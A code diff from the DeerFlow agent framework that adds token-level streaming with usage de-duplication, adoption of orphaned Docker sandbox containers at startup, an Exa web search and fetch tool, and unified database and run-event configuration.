- type="messages-tuple" data={"type": "ai", "content": str, "id": str, "usage_metadata": {...}}
|
||||
- type="messages-tuple" data={"type": "ai", "content": <delta>, "id": str}
|
||||
- type="messages-tuple" data={"type": "ai", "content": <delta>, "id": str, "usage_metadata": {...}}
|
||||
- type="messages-tuple" data={"type": "ai", "content": "", "id": str, "tool_calls": [...]}
|
||||
- type="messages-tuple" data={"type": "tool", "content": str, "name": str, "tool_call_id": str, "id": str}
|
||||
- type="end" data={"usage": {"input_tokens": int, "output_tokens": int, "total_tokens": int}}
|
||||
@@ -364,13 +556,47 @@ class DeerFlowClient:
|
||||
context["agent_name"] = self._agent_name
|
||||
|
||||
seen_ids: set[str] = set()
|
||||
# Cross-mode handoff: ids already streamed via LangGraph ``messages``
|
||||
# mode so the ``values`` path skips re-synthesis of the same message.
|
||||
streamed_ids: set[str] = set()
|
||||
# The same message id carries identical cumulative ``usage_metadata``
|
||||
# in both the final ``messages`` chunk and the values snapshot —
|
||||
# count it only on whichever arrives first.
|
||||
counted_usage_ids: set[str] = set()
|
||||
cumulative_usage: dict[str, int] = {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0}
|
||||
|
||||
def _account_usage(msg_id: str | None, usage: Any) -> dict | None:
|
||||
"""Add *usage* to cumulative totals if this id has not been counted.
|
||||
|
||||
``usage`` is a ``langchain_core.messages.UsageMetadata`` TypedDict
|
||||
or ``None``; typed as ``Any`` because TypedDicts are not
|
||||
structurally assignable to plain ``dict`` under strict type
|
||||
checking. Returns the normalized usage dict (for attaching
|
||||
to an event) when we accepted it, otherwise ``None``.
|
||||
"""
|
||||
if not usage:
|
||||
return None
|
||||
if msg_id and msg_id in counted_usage_ids:
|
||||
return None
|
||||
if msg_id:
|
||||
counted_usage_ids.add(msg_id)
|
||||
input_tokens = usage.get("input_tokens", 0) or 0
|
||||
output_tokens = usage.get("output_tokens", 0) or 0
|
||||
total_tokens = usage.get("total_tokens", 0) or 0
|
||||
cumulative_usage["input_tokens"] += input_tokens
|
||||
cumulative_usage["output_tokens"] += output_tokens
|
||||
cumulative_usage["total_tokens"] += total_tokens
|
||||
return {
|
||||
"input_tokens": input_tokens,
|
||||
"output_tokens": output_tokens,
|
||||
"total_tokens": total_tokens,
|
||||
}
|
||||
|
||||
for item in self._agent.stream(
|
||||
state,
|
||||
config=config,
|
||||
context=context,
|
||||
stream_mode=["values", "custom"],
|
||||
stream_mode=["values", "messages", "custom"],
|
||||
):
|
||||
if isinstance(item, tuple) and len(item) == 2:
|
||||
mode, chunk = item
|
||||
@@ -382,6 +608,36 @@ class DeerFlowClient:
|
||||
yield StreamEvent(type="custom", data=chunk)
|
||||
continue
|
||||
|
||||
if mode == "messages":
|
||||
# LangGraph ``messages`` mode emits ``(message_chunk, metadata)``.
|
||||
if isinstance(chunk, tuple) and len(chunk) == 2:
|
||||
msg_chunk, _metadata = chunk
|
||||
else:
|
||||
msg_chunk = chunk
|
||||
|
||||
msg_id = getattr(msg_chunk, "id", None)
|
||||
|
||||
if isinstance(msg_chunk, AIMessage):
|
||||
text = self._extract_text(msg_chunk.content)
|
||||
counted_usage = _account_usage(msg_id, msg_chunk.usage_metadata)
|
||||
|
||||
if text:
|
||||
if msg_id:
|
||||
streamed_ids.add(msg_id)
|
||||
yield self._ai_text_event(msg_id, text, counted_usage)
|
||||
|
||||
if msg_chunk.tool_calls:
|
||||
if msg_id:
|
||||
streamed_ids.add(msg_id)
|
||||
yield self._ai_tool_calls_event(msg_id, msg_chunk.tool_calls)
|
||||
|
||||
elif isinstance(msg_chunk, ToolMessage):
|
||||
if msg_id:
|
||||
streamed_ids.add(msg_id)
|
||||
yield self._tool_message_event(msg_chunk)
|
||||
continue
|
||||
|
||||
# mode == "values"
|
||||
messages = chunk.get("messages", [])
|
||||
|
||||
for msg in messages:
|
||||
@@ -391,47 +647,25 @@ class DeerFlowClient:
|
||||
if msg_id:
|
||||
seen_ids.add(msg_id)
|
||||
|
||||
# Already streamed via ``messages`` mode; only (defensively)
|
||||
# capture usage here and skip re-synthesizing the event.
|
||||
if msg_id and msg_id in streamed_ids:
|
||||
if isinstance(msg, AIMessage):
|
||||
_account_usage(msg_id, getattr(msg, "usage_metadata", None))
|
||||
continue
|
||||
|
||||
if isinstance(msg, AIMessage):
|
||||
# Track token usage from AI messages
|
||||
usage = getattr(msg, "usage_metadata", None)
|
||||
if usage:
|
||||
cumulative_usage["input_tokens"] += usage.get("input_tokens", 0) or 0
|
||||
cumulative_usage["output_tokens"] += usage.get("output_tokens", 0) or 0
|
||||
cumulative_usage["total_tokens"] += usage.get("total_tokens", 0) or 0
|
||||
counted_usage = _account_usage(msg_id, msg.usage_metadata)
|
||||
|
||||
if msg.tool_calls:
|
||||
yield StreamEvent(
|
||||
type="messages-tuple",
|
||||
data={
|
||||
"type": "ai",
|
||||
"content": "",
|
||||
"id": msg_id,
|
||||
"tool_calls": [{"name": tc["name"], "args": tc["args"], "id": tc.get("id")} for tc in msg.tool_calls],
|
||||
},
|
||||
)
|
||||
yield self._ai_tool_calls_event(msg_id, msg.tool_calls)
|
||||
|
||||
text = self._extract_text(msg.content)
|
||||
if text:
|
||||
event_data: dict[str, Any] = {"type": "ai", "content": text, "id": msg_id}
|
||||
if usage:
|
||||
event_data["usage_metadata"] = {
|
||||
"input_tokens": usage.get("input_tokens", 0) or 0,
|
||||
"output_tokens": usage.get("output_tokens", 0) or 0,
|
||||
"total_tokens": usage.get("total_tokens", 0) or 0,
|
||||
}
|
||||
yield StreamEvent(type="messages-tuple", data=event_data)
|
||||
yield self._ai_text_event(msg_id, text, counted_usage)
|
||||
|
||||
elif isinstance(msg, ToolMessage):
|
||||
yield StreamEvent(
|
||||
type="messages-tuple",
|
||||
data={
|
||||
"type": "tool",
|
||||
"content": self._extract_text(msg.content),
|
||||
"name": getattr(msg, "name", None),
|
||||
"tool_call_id": getattr(msg, "tool_call_id", None),
|
||||
"id": msg_id,
|
||||
},
|
||||
)
|
||||
yield self._tool_message_event(msg)
|
||||
|
||||
# Emit a values event for each state snapshot
|
||||
yield StreamEvent(
|
||||
@@ -448,10 +682,12 @@ class DeerFlowClient:
|
||||
def chat(self, message: str, *, thread_id: str | None = None, **kwargs) -> str:
|
||||
"""Send a message and return the final text response.
|
||||
|
||||
Convenience wrapper around :meth:`stream` that returns only the
|
||||
**last** AI text from ``messages-tuple`` events. If the agent emits
|
||||
multiple text segments in one turn, intermediate segments are
|
||||
discarded. Use :meth:`stream` directly to capture all events.
|
||||
Convenience wrapper around :meth:`stream` that accumulates delta
|
||||
``messages-tuple`` events per ``id`` and returns the text of the
|
||||
**last** AI message to complete. Intermediate AI messages (e.g.
|
||||
planner drafts) are discarded — only the final id's accumulated
|
||||
text is returned. Use :meth:`stream` directly if you need every
|
||||
delta as it arrives.
|
||||
|
||||
Args:
|
||||
message: User message text.
|
||||
@@ -459,15 +695,21 @@ class DeerFlowClient:
|
||||
**kwargs: Override client defaults (same as stream()).
|
||||
|
||||
Returns:
|
||||
The last AI message text, or empty string if no response.
|
||||
The accumulated text of the last AI message, or empty string
|
||||
if no AI text was produced.
|
||||
"""
|
||||
last_text = ""
|
||||
# Per-id delta lists joined once at the end — avoids the O(n²) cost
|
||||
# of repeated ``str + str`` on a growing buffer for long responses.
|
||||
chunks: dict[str, list[str]] = {}
|
||||
last_id: str = ""
|
||||
for event in self.stream(message, thread_id=thread_id, **kwargs):
|
||||
if event.type == "messages-tuple" and event.data.get("type") == "ai":
|
||||
content = event.data.get("content", "")
|
||||
if content:
|
||||
last_text = content
|
||||
return last_text
|
||||
msg_id = event.data.get("id") or ""
|
||||
delta = event.data.get("content", "")
|
||||
if delta:
|
||||
chunks.setdefault(msg_id, []).append(delta)
|
||||
last_id = msg_id
|
||||
return "".join(chunks.get(last_id, ()))
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Public API — configuration queries
|
||||
|
||||
@@ -112,6 +112,9 @@ class AioSandboxProvider(SandboxProvider):
|
||||
atexit.register(self.shutdown)
|
||||
self._register_signal_handlers()
|
||||
|
||||
# Reconcile orphaned containers from previous process lifecycles
|
||||
self._reconcile_orphans()
|
||||
|
||||
# Start idle checker if enabled
|
||||
if self._config.get("idle_timeout", DEFAULT_IDLE_TIMEOUT) > 0:
|
||||
self._start_idle_checker()
|
||||
@@ -175,6 +178,51 @@ class AioSandboxProvider(SandboxProvider):
|
||||
resolved[key] = str(value)
|
||||
return resolved
|
||||
|
||||
# ── Startup reconciliation ────────────────────────────────────────────
|
||||
|
||||
def _reconcile_orphans(self) -> None:
|
||||
"""Reconcile orphaned containers left by previous process lifecycles.
|
||||
|
||||
On startup, enumerate all running containers matching our prefix
|
||||
and adopt them all into the warm pool. The idle checker will reclaim
|
||||
containers that nobody re-acquires within ``idle_timeout``.
|
||||
|
||||
All containers are adopted unconditionally because we cannot
|
||||
distinguish "orphaned" from "actively used by another process"
|
||||
based on age alone — ``idle_timeout`` represents inactivity, not
|
||||
uptime. Adopting into the warm pool and letting the idle checker
|
||||
decide avoids destroying containers that a concurrent process may
|
||||
still be using.
|
||||
|
||||
This closes the fundamental gap where in-memory state loss (process
|
||||
restart, crash, SIGKILL) leaves Docker containers running forever.
|
||||
"""
|
||||
try:
|
||||
running = self._backend.list_running()
|
||||
except Exception as e:
|
||||
logger.warning(f"Failed to enumerate running containers during startup reconciliation: {e}")
|
||||
return
|
||||
|
||||
if not running:
|
||||
return
|
||||
|
||||
current_time = time.time()
|
||||
adopted = 0
|
||||
|
||||
for info in running:
|
||||
age = current_time - info.created_at if info.created_at > 0 else float("inf")
|
||||
# Single lock acquisition per container: atomic check-and-insert.
|
||||
# Avoids a TOCTOU window between the "already tracked?" check and
|
||||
# the warm-pool insert.
|
||||
with self._lock:
|
||||
if info.sandbox_id in self._sandboxes or info.sandbox_id in self._warm_pool:
|
||||
continue
|
||||
self._warm_pool[info.sandbox_id] = (info, current_time)
|
||||
adopted += 1
|
||||
logger.info(f"Adopted container {info.sandbox_id} into warm pool (age: {age:.0f}s)")
|
||||
|
||||
logger.info(f"Startup reconciliation complete: {adopted} adopted into warm pool, {len(running)} total found")
|
||||
|
||||
# ── Deterministic ID ─────────────────────────────────────────────────
|
||||
|
||||
@staticmethod
|
||||
@@ -316,13 +364,23 @@ class AioSandboxProvider(SandboxProvider):
|
||||
# ── Signal handling ──────────────────────────────────────────────────
|
||||
|
||||
def _register_signal_handlers(self) -> None:
|
||||
"""Register signal handlers for graceful shutdown."""
|
||||
"""Register signal handlers for graceful shutdown.
|
||||
|
||||
Handles SIGTERM, SIGINT, and SIGHUP (terminal close) to ensure
|
||||
sandbox containers are cleaned up even when the user closes the terminal.
|
||||
"""
|
||||
self._original_sigterm = signal.getsignal(signal.SIGTERM)
|
||||
self._original_sigint = signal.getsignal(signal.SIGINT)
|
||||
self._original_sighup = signal.getsignal(signal.SIGHUP) if hasattr(signal, "SIGHUP") else None
|
||||
|
||||
def signal_handler(signum, frame):
|
||||
self.shutdown()
|
||||
original = self._original_sigterm if signum == signal.SIGTERM else self._original_sigint
|
||||
if signum == signal.SIGTERM:
|
||||
original = self._original_sigterm
|
||||
elif hasattr(signal, "SIGHUP") and signum == signal.SIGHUP:
|
||||
original = self._original_sighup
|
||||
else:
|
||||
original = self._original_sigint
|
||||
if callable(original):
|
||||
original(signum, frame)
|
||||
elif original == signal.SIG_DFL:
|
||||
@@ -332,6 +390,8 @@ class AioSandboxProvider(SandboxProvider):
|
||||
try:
|
||||
signal.signal(signal.SIGTERM, signal_handler)
|
||||
signal.signal(signal.SIGINT, signal_handler)
|
||||
if hasattr(signal, "SIGHUP"):
|
||||
signal.signal(signal.SIGHUP, signal_handler)
|
||||
except ValueError:
|
||||
logger.debug("Could not register signal handlers (not main thread)")
|
||||
|
||||
|
||||
@@ -96,3 +96,19 @@ class SandboxBackend(ABC):
|
||||
SandboxInfo if found and healthy, None otherwise.
|
||||
"""
|
||||
...
|
||||
|
||||
def list_running(self) -> list[SandboxInfo]:
|
||||
"""Enumerate all running sandboxes managed by this backend.
|
||||
|
||||
Used for startup reconciliation: when the process restarts, it needs
|
||||
to discover containers started by previous processes so they can be
|
||||
adopted into the warm pool or destroyed if idle too long.
|
||||
|
||||
The default implementation returns an empty list, which is correct
|
||||
for backends that don't manage local containers (e.g., RemoteSandboxBackend
|
||||
delegates lifecycle to the provisioner which handles its own cleanup).
|
||||
|
||||
Returns:
|
||||
A list of SandboxInfo for all currently running sandboxes.
|
||||
"""
|
||||
return []
|
||||
|
||||
@@ -6,9 +6,11 @@ Handles container lifecycle, port allocation, and cross-process container discov
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import subprocess
|
||||
from datetime import datetime
|
||||
|
||||
from deerflow.utils.network import get_free_port, release_port
|
||||
|
||||
@@ -18,6 +20,52 @@ from .sandbox_info import SandboxInfo
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def _parse_docker_timestamp(raw: str) -> float:
|
||||
"""Parse Docker's ISO 8601 timestamp into a Unix epoch float.
|
||||
|
||||
Docker returns timestamps with nanosecond precision and a trailing ``Z``
|
||||
(e.g. ``2026-04-08T01:22:50.123456789Z``). Python's ``fromisoformat``
|
||||
accepts at most microseconds and (pre-3.11) does not accept ``Z``, so the
|
||||
string is normalized before parsing. Returns ``0.0`` on empty input or
|
||||
parse failure so callers can use ``0.0`` as a sentinel for "unknown age".
|
||||
"""
|
||||
if not raw:
|
||||
return 0.0
|
||||
try:
|
||||
s = raw.strip()
|
||||
if "." in s:
|
||||
dot_pos = s.index(".")
|
||||
tz_start = dot_pos + 1
|
||||
while tz_start < len(s) and s[tz_start].isdigit():
|
||||
tz_start += 1
|
||||
frac = s[dot_pos + 1 : tz_start][:6] # truncate to microseconds
|
||||
tz_suffix = s[tz_start:]
|
||||
s = s[: dot_pos + 1] + frac + tz_suffix
|
||||
if s.endswith("Z"):
|
||||
s = s[:-1] + "+00:00"
|
||||
return datetime.fromisoformat(s).timestamp()
|
||||
except (ValueError, TypeError) as e:
|
||||
logger.debug(f"Could not parse docker timestamp {raw!r}: {e}")
|
||||
return 0.0
|
||||
|
||||
|
||||
def _extract_host_port(inspect_entry: dict, container_port: int) -> int | None:
|
||||
"""Extract the host port mapped to ``container_port/tcp`` from a docker inspect entry.
|
||||
|
||||
Returns None if the container has no port mapping for that port.
|
||||
"""
|
||||
try:
|
||||
ports = (inspect_entry.get("NetworkSettings") or {}).get("Ports") or {}
|
||||
bindings = ports.get(f"{container_port}/tcp") or []
|
||||
if bindings:
|
||||
host_port = bindings[0].get("HostPort")
|
||||
if host_port:
|
||||
return int(host_port)
|
||||
except (ValueError, TypeError, AttributeError):
|
||||
pass
|
||||
return None
|
||||
|
||||
|
||||
def _format_container_mount(runtime: str, host_path: str, container_path: str, read_only: bool) -> list[str]:
|
||||
"""Format a bind-mount argument for the selected runtime.
|
||||
|
||||
@@ -172,8 +220,12 @@ class LocalContainerBackend(SandboxBackend):
|
||||
|
||||
def destroy(self, info: SandboxInfo) -> None:
|
||||
"""Stop the container and release its port."""
|
||||
if info.container_id:
|
||||
self._stop_container(info.container_id)
|
||||
# Prefer container_id, fall back to container_name (both accepted by docker stop).
|
||||
# This ensures containers discovered via list_running() (which only has the name)
|
||||
# can also be stopped.
|
||||
stop_target = info.container_id or info.container_name
|
||||
if stop_target:
|
||||
self._stop_container(stop_target)
|
||||
# Extract port from sandbox_url for release
|
||||
try:
|
||||
from urllib.parse import urlparse
|
||||
@@ -222,6 +274,129 @@ class LocalContainerBackend(SandboxBackend):
|
||||
container_name=container_name,
|
||||
)
|
||||
|
||||
def list_running(self) -> list[SandboxInfo]:
|
||||
"""Enumerate all running containers matching the configured prefix.
|
||||
|
||||
Uses a single ``docker ps`` call to list container names, then a
|
||||
single batched ``docker inspect`` call to retrieve creation timestamp
|
||||
and port mapping for all containers at once. Total subprocess calls:
|
||||
2 (down from 2N+1 in the naive per-container approach).
|
||||
|
||||
Note: Docker's ``--filter name=`` performs *substring* matching,
|
||||
so a secondary ``startswith`` check is applied to ensure only
|
||||
containers with the exact prefix are included.
|
||||
|
||||
Containers without port mappings are still included (with empty
|
||||
sandbox_url) so that startup reconciliation can adopt orphans
|
||||
regardless of their port state.
|
||||
"""
|
||||
# Step 1: enumerate container names via docker ps
|
||||
try:
|
||||
result = subprocess.run(
|
||||
[
|
||||
self._runtime,
|
||||
"ps",
|
||||
"--filter",
|
||||
f"name={self._container_prefix}-",
|
||||
"--format",
|
||||
"{{.Names}}",
|
||||
],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=10,
|
||||
)
|
||||
if result.returncode != 0:
|
||||
stderr = (result.stderr or "").strip()
|
||||
logger.warning(
|
||||
"Failed to list running containers with %s ps (returncode=%s, stderr=%s)",
|
||||
self._runtime,
|
||||
result.returncode,
|
||||
stderr or "<empty>",
|
||||
)
|
||||
return []
|
||||
if not result.stdout.strip():
|
||||
return []
|
||||
except (subprocess.CalledProcessError, subprocess.TimeoutExpired, FileNotFoundError, OSError) as e:
|
||||
logger.warning(f"Failed to list running containers: {e}")
|
||||
return []
|
||||
|
||||
# Filter to names matching our exact prefix (docker filter is substring-based)
|
||||
container_names = [name.strip() for name in result.stdout.strip().splitlines() if name.strip().startswith(self._container_prefix + "-")]
|
||||
if not container_names:
|
||||
return []
|
||||
|
||||
# Step 2: batched docker inspect — single subprocess call for all containers
|
||||
inspections = self._batch_inspect(container_names)
|
||||
|
||||
infos: list[SandboxInfo] = []
|
||||
sandbox_host = os.environ.get("DEER_FLOW_SANDBOX_HOST", "localhost")
|
||||
for container_name in container_names:
|
||||
data = inspections.get(container_name)
|
||||
if data is None:
|
||||
# Container disappeared between ps and inspect, or inspect failed
|
||||
continue
|
||||
created_at, host_port = data
|
||||
sandbox_id = container_name[len(self._container_prefix) + 1 :]
|
||||
sandbox_url = f"http://{sandbox_host}:{host_port}" if host_port else ""
|
||||
|
||||
infos.append(
|
||||
SandboxInfo(
|
||||
sandbox_id=sandbox_id,
|
||||
sandbox_url=sandbox_url,
|
||||
container_name=container_name,
|
||||
created_at=created_at,
|
||||
)
|
||||
)
|
||||
|
||||
logger.info(f"Found {len(infos)} running sandbox container(s)")
|
||||
return infos
|
||||
|
||||
def _batch_inspect(self, container_names: list[str]) -> dict[str, tuple[float, int | None]]:
|
||||
"""Batch-inspect containers in a single subprocess call.
|
||||
|
||||
Returns a mapping of ``container_name -> (created_at, host_port)``.
|
||||
Missing containers or parse failures are silently dropped from the result.
|
||||
"""
|
||||
if not container_names:
|
||||
return {}
|
||||
try:
|
||||
result = subprocess.run(
|
||||
[self._runtime, "inspect", *container_names],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=15,
|
||||
)
|
||||
except (subprocess.CalledProcessError, subprocess.TimeoutExpired, FileNotFoundError, OSError) as e:
|
||||
logger.warning(f"Failed to batch-inspect containers: {e}")
|
||||
return {}
|
||||
|
||||
if result.returncode != 0:
|
||||
stderr = (result.stderr or "").strip()
|
||||
logger.warning(
|
||||
"Failed to batch-inspect containers with %s inspect (returncode=%s, stderr=%s)",
|
||||
self._runtime,
|
||||
result.returncode,
|
||||
stderr or "<empty>",
|
||||
)
|
||||
return {}
|
||||
|
||||
try:
|
||||
payload = json.loads(result.stdout or "[]")
|
||||
except json.JSONDecodeError as e:
|
||||
logger.warning(f"Failed to parse docker inspect output as JSON: {e}")
|
||||
return {}
|
||||
|
||||
out: dict[str, tuple[float, int | None]] = {}
|
||||
for entry in payload:
|
||||
# ``Name`` is prefixed with ``/`` in the docker inspect response
|
||||
name = (entry.get("Name") or "").lstrip("/")
|
||||
if not name:
|
||||
continue
|
||||
created_at = _parse_docker_timestamp(entry.get("Created", ""))
|
||||
host_port = _extract_host_port(entry, 8080)
|
||||
out[name] = (created_at, host_port)
|
||||
return out
|
||||
|
||||
# ── Container operations ─────────────────────────────────────────────
|
||||
|
||||
def _start_container(
|
||||
|
||||
@@ -0,0 +1,79 @@
|
||||
import json
|
||||
|
||||
from exa_py import Exa
|
||||
from langchain.tools import tool
|
||||
|
||||
from deerflow.config import get_app_config
|
||||
|
||||
|
||||
def _get_exa_client(tool_name: str = "web_search") -> Exa:
|
||||
config = get_app_config().get_tool_config(tool_name)
|
||||
api_key = None
|
||||
if config is not None and "api_key" in config.model_extra:
|
||||
api_key = config.model_extra.get("api_key")
|
||||
return Exa(api_key=api_key)
|
||||
|
||||
|
||||
@tool("web_search", parse_docstring=True)
|
||||
def web_search_tool(query: str) -> str:
|
||||
"""Search the web.
|
||||
|
||||
Args:
|
||||
query: The query to search for.
|
||||
"""
|
||||
try:
|
||||
config = get_app_config().get_tool_config("web_search")
|
||||
max_results = 5
|
||||
search_type = "auto"
|
||||
contents_max_characters = 1000
|
||||
if config is not None:
|
||||
max_results = config.model_extra.get("max_results", max_results)
|
||||
search_type = config.model_extra.get("search_type", search_type)
|
||||
contents_max_characters = config.model_extra.get("contents_max_characters", contents_max_characters)
|
||||
|
||||
client = _get_exa_client()
|
||||
res = client.search(
|
||||
query,
|
||||
type=search_type,
|
||||
num_results=max_results,
|
||||
contents={"highlights": {"max_characters": contents_max_characters}},
|
||||
)
|
||||
|
||||
normalized_results = [
|
||||
{
|
||||
"title": result.title or "",
|
||||
"url": result.url or "",
|
||||
"snippet": "\n".join(result.highlights) if result.highlights else "",
|
||||
}
|
||||
for result in res.results
|
||||
]
|
||||
json_results = json.dumps(normalized_results, indent=2, ensure_ascii=False)
|
||||
return json_results
|
||||
except Exception as e:
|
||||
return f"Error: {str(e)}"
|
||||
|
||||
|
||||
@tool("web_fetch", parse_docstring=True)
|
||||
def web_fetch_tool(url: str) -> str:
|
||||
"""Fetch the contents of a web page at a given URL.
|
||||
Only fetch EXACT URLs that have been provided directly by the user or have been returned in results from the web_search and web_fetch tools.
|
||||
This tool can NOT access content that requires authentication, such as private Google Docs or pages behind login walls.
|
||||
Do NOT add www. to URLs that do NOT have them.
|
||||
URLs must include the schema: https://example.com is a valid URL while example.com is an invalid URL.
|
||||
|
||||
Args:
|
||||
url: The URL to fetch the contents of.
|
||||
"""
|
||||
try:
|
||||
client = _get_exa_client("web_fetch")
|
||||
res = client.get_contents([url], text={"max_characters": 4096})
|
||||
|
||||
if res.results:
|
||||
result = res.results[0]
|
||||
title = result.title or "Untitled"
|
||||
text = result.text or ""
|
||||
return f"# {title}\n\n{text[:4096]}"
|
||||
else:
|
||||
return "Error: No results found"
|
||||
except Exception as e:
|
||||
return f"Error: {str(e)}"
|
||||
@@ -6,10 +6,10 @@ from langchain.tools import tool
|
||||
from deerflow.config import get_app_config
|
||||
|
||||
|
||||
def _get_firecrawl_client() -> FirecrawlApp:
|
||||
config = get_app_config().get_tool_config("web_search")
|
||||
def _get_firecrawl_client(tool_name: str = "web_search") -> FirecrawlApp:
|
||||
config = get_app_config().get_tool_config(tool_name)
|
||||
api_key = None
|
||||
if config is not None:
|
||||
if config is not None and "api_key" in config.model_extra:
|
||||
api_key = config.model_extra.get("api_key")
|
||||
return FirecrawlApp(api_key=api_key) # type: ignore[arg-type]
|
||||
|
||||
@@ -27,7 +27,7 @@ def web_search_tool(query: str) -> str:
|
||||
if config is not None:
|
||||
max_results = config.model_extra.get("max_results", max_results)
|
||||
|
||||
client = _get_firecrawl_client()
|
||||
client = _get_firecrawl_client("web_search")
|
||||
result = client.search(query, limit=max_results)
|
||||
|
||||
# result.web contains list of SearchResultWeb objects
|
||||
@@ -58,7 +58,7 @@ def web_fetch_tool(url: str) -> str:
|
||||
url: The URL to fetch the contents of.
|
||||
"""
|
||||
try:
|
||||
client = _get_firecrawl_client()
|
||||
client = _get_firecrawl_client("web_fetch")
|
||||
result = client.scrape(url, formats=["markdown"])
|
||||
|
||||
markdown_content = result.markdown or ""
|
||||
|
||||
@@ -10,10 +10,12 @@ from pydantic import BaseModel, ConfigDict, Field
|
||||
|
||||
from deerflow.config.acp_config import load_acp_config_from_dict
|
||||
from deerflow.config.checkpointer_config import CheckpointerConfig, load_checkpointer_config_from_dict
|
||||
from deerflow.config.database_config import DatabaseConfig
|
||||
from deerflow.config.extensions_config import ExtensionsConfig
|
||||
from deerflow.config.guardrails_config import GuardrailsConfig, load_guardrails_config_from_dict
|
||||
from deerflow.config.memory_config import MemoryConfig, load_memory_config_from_dict
|
||||
from deerflow.config.model_config import ModelConfig
|
||||
from deerflow.config.run_events_config import RunEventsConfig
|
||||
from deerflow.config.sandbox_config import SandboxConfig
|
||||
from deerflow.config.skill_evolution_config import SkillEvolutionConfig
|
||||
from deerflow.config.skills_config import SkillsConfig
|
||||
@@ -56,6 +58,8 @@ class AppConfig(BaseModel):
|
||||
subagents: SubagentsAppConfig = Field(default_factory=SubagentsAppConfig, description="Subagent runtime configuration")
|
||||
guardrails: GuardrailsConfig = Field(default_factory=GuardrailsConfig, description="Guardrail middleware configuration")
|
||||
model_config = ConfigDict(extra="allow", frozen=False)
|
||||
database: DatabaseConfig = Field(default_factory=DatabaseConfig, description="Unified database backend configuration")
|
||||
run_events: RunEventsConfig = Field(default_factory=RunEventsConfig, description="Run event storage configuration")
|
||||
checkpointer: CheckpointerConfig | None = Field(default=None, description="Checkpointer configuration")
|
||||
stream_bridge: StreamBridgeConfig | None = Field(default=None, description="Stream bridge configuration")
|
||||
|
||||
|
||||
@@ -0,0 +1,92 @@
|
||||
"""Unified database backend configuration.
|
||||
|
||||
Controls BOTH the LangGraph checkpointer and the DeerFlow application
|
||||
persistence layer (runs, threads metadata, users, etc.). The user
|
||||
configures one backend; the system handles physical separation details.
|
||||
|
||||
SQLite mode: checkpointer and app use different .db files in the same
|
||||
directory to avoid write-lock contention. This is automatic.
|
||||
|
||||
Postgres mode: both use the same database URL but maintain independent
|
||||
connection pools with different lifecycles.
|
||||
|
||||
Memory mode: checkpointer uses MemorySaver, app uses in-memory stores.
|
||||
No database is initialized.
|
||||
|
||||
Sensitive values (postgres_url) should use $VAR syntax in config.yaml
|
||||
to reference environment variables from .env:
|
||||
|
||||
database:
|
||||
backend: postgres
|
||||
postgres_url: $DATABASE_URL
|
||||
|
||||
The $VAR resolution is handled by AppConfig.resolve_env_variables()
|
||||
before this config is instantiated -- DatabaseConfig itself does not
|
||||
need to do any environment variable processing.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
from typing import Literal
|
||||
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
|
||||
class DatabaseConfig(BaseModel):
|
||||
backend: Literal["memory", "sqlite", "postgres"] = Field(
|
||||
default="memory",
|
||||
description=("Storage backend for both checkpointer and application data. 'memory' for development (no persistence across restarts), 'sqlite' for single-node deployment, 'postgres' for production multi-node deployment."),
|
||||
)
|
||||
sqlite_dir: str = Field(
|
||||
default=".deer-flow/data",
|
||||
description=("Directory for SQLite database files. Checkpointer uses {sqlite_dir}/checkpoints.db, application data uses {sqlite_dir}/app.db."),
|
||||
)
|
||||
postgres_url: str = Field(
|
||||
default="",
|
||||
description=(
|
||||
"PostgreSQL connection URL, shared by checkpointer and app. "
|
||||
"Use $DATABASE_URL in config.yaml to reference .env. "
|
||||
"Example: postgresql://user:pass@host:5432/deerflow "
|
||||
"(the +asyncpg driver suffix is added automatically where needed)."
|
||||
),
|
||||
)
|
||||
echo_sql: bool = Field(
|
||||
default=False,
|
||||
description="Echo all SQL statements to log (debug only).",
|
||||
)
|
||||
pool_size: int = Field(
|
||||
default=5,
|
||||
description="Connection pool size for the app ORM engine (postgres only).",
|
||||
)
|
||||
|
||||
# -- Derived helpers (not user-configured) --
|
||||
|
||||
@property
|
||||
def _resolved_sqlite_dir(self) -> str:
|
||||
"""Resolve sqlite_dir to an absolute path (relative to CWD)."""
|
||||
from pathlib import Path
|
||||
|
||||
return str(Path(self.sqlite_dir).resolve())
|
||||
|
||||
@property
|
||||
def checkpointer_sqlite_path(self) -> str:
|
||||
"""SQLite file path for the LangGraph checkpointer."""
|
||||
return os.path.join(self._resolved_sqlite_dir, "checkpoints.db")
|
||||
|
||||
@property
|
||||
def app_sqlite_path(self) -> str:
|
||||
"""SQLite file path for application ORM data."""
|
||||
return os.path.join(self._resolved_sqlite_dir, "app.db")
|
||||
|
||||
@property
|
||||
def app_sqlalchemy_url(self) -> str:
|
||||
"""SQLAlchemy async URL for the application ORM engine."""
|
||||
if self.backend == "sqlite":
|
||||
return f"sqlite+aiosqlite:///{self.app_sqlite_path}"
|
||||
if self.backend == "postgres":
|
||||
url = self.postgres_url
|
||||
if url.startswith("postgresql://"):
|
||||
url = url.replace("postgresql://", "postgresql+asyncpg://", 1)
|
||||
return url
|
||||
raise ValueError(f"No SQLAlchemy URL for backend={self.backend!r}")
|
||||
@@ -27,6 +27,10 @@ class ModelConfig(BaseModel):
|
||||
default_factory=lambda: None,
|
||||
description="Extra settings to be passed to the model when thinking is enabled",
|
||||
)
|
||||
when_thinking_disabled: dict | None = Field(
|
||||
default_factory=lambda: None,
|
||||
description="Extra settings to be passed to the model when thinking is disabled",
|
||||
)
|
||||
supports_vision: bool = Field(default_factory=lambda: False, description="Whether the model supports vision/image inputs")
|
||||
thinking: dict | None = Field(
|
||||
default_factory=lambda: None,
|
||||
|
||||
@@ -0,0 +1,33 @@
|
||||
"""Run event storage configuration.
|
||||
|
||||
Controls where run events (messages + execution traces) are persisted.
|
||||
|
||||
Backends:
|
||||
- memory: In-memory storage, data lost on restart. Suitable for
|
||||
development and testing.
|
||||
- db: SQL database via SQLAlchemy ORM. Provides full query capability.
|
||||
Suitable for production deployments.
|
||||
- jsonl: Append-only JSONL files. Lightweight alternative for
|
||||
single-node deployments that need persistence without a database.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
